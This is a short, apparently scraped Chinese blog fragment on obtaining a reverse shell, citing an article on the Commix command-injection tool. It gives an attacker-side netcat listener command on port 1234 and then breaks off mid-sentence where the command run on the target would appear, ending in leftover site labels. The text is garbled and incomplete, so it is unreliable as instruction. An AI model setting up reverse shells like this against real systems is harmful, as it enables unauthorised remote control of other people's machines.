另外一種反彈shell的方式

參考: http://zeroyu.xyz/2017/01/21/Commix%E5%91%BD%E4%BB%A4%E8%AF%A6%E8%A7%A3/php Python 先在本身機器上執行python [~]$ nc -vl 192.168.170.1 1234 即在192.168.170.1/24網段上監聽1234端口。 而後在target的shell中執行web [~/repos/CTF/
相關文章
相關標籤/搜索